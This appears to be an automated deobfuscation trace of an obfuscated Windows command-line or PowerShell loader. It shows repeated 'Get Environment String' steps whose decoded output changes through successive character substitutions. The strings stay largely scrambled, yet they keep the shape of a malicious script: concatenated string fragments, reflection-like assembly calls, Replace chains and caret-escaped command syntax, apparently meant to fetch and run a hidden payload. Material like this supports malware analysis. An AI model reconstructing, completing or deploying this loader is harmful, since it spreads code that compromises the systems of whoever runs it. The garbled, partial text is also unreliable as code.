e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = *{[, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le80e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y80s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = @#?., result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 jUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^& se% ajUI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le80e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11Tdjh eqFl6N7y80s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yjUa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yjUaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = '}_-, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 jUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy::Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^& se% ajUI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yjUa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yjUaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = ;], result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFlDn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy9iy+{7yDa%zEhA]Pjyiy#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDniy+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]PjyiyDn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo True 1
Fn
Get Environment String name = `\+, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy9iy+{7yDa%zEhA]Pjyiy#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDniy+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]PjyiyDn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = _@.-, result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H28+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmuQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = $', result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7axd'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTdvE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecv%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = .,`_, result_out = seGC7y suTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7axd'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7'axd{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06)axd{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn)axd{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTduE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = ',`+, result_out = seGC7y suTd]Fl6aK. 1 @sheZ7yelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.D]a'+'4'+'Zng9a7['+'Fl66k7yBBQI37s'+'aKFl] jh`sGC7ye'+'m.'+'D]a4Zn'+'g.B'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yDa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGC7y2BQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yBBQI'+'mQIaKFl] B`'+'GC7y'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'k7yBBQI7 Zn10..H'+'2('+'))\Fl66k7yBBQI'+'GC7y'+'GC7yaKFl66k7yBBQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yBBQI7,'+'Fl6'+'6k7yBBQI_'+')[Fl66k7yBBQImQI'+'{Fl66k7yBBQI'+'_*H28+Fl66k7yBBQI7PjyaK1{maGC7y%zEhPjy::zEh'+'lX'+'X]11Fl66'+'k7yBBQIGC7yGC7y.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66k7yBBQIGC7y'+'GC7y.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'ncX37Zn'+'g'+'Pjy::Ajh7yDaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').Rek7yla7yDaE1'9a7',{s%RInaEPjy{7yDa%zEhA]Pjy#H).Rek7yla7yDaE11{7yDa%zEhA]Pjy98+{7yDa%zEhA]Pjy8#+{7yDa%zEhA]PjyDn06),{s%RInaEPjy{7yDa%zEhA]PjyDn2H).Rek7yla7yDaE11{7yDa%zEhA]PjyDnDn8+{7yDa%zEhA]Pjy5H+{7yDa%zEhA]Pjy8Dn),{s%RInaEPjy{7yDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGC7y).7yaTduE.InFl6PjQIE7yDaXmBQIanD.IqFl6N7yPjQIes7yDaRZGC7yy%11Tdjh eqFl6N7y:s3Td]7y).Fl6aTd3e ) ^^^|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6Nk7yPjTdIc 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y:7yDaXmsGC7yyec{H,2H,25Pjy-TdQXIn'')1@Znk7yu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
